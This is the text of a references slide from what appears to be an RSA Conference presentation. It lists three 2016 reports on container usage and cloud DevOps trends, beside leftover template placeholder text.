  • 53. Presenter’s Company Logo – replace or delete on master slide #RSAC References 53 https://www.cloudfoundry.org/wp-content/uploads/2016/06/Cloud- Foundry-2016-Container-Report.pdf https://clusterhq.com/assets/pdfs/state-of-container-usage-june- 2016.pdf http://www.rightscale.com/blog/cloud-industry-insights/new-devops- trends-2016-state-cloud-survey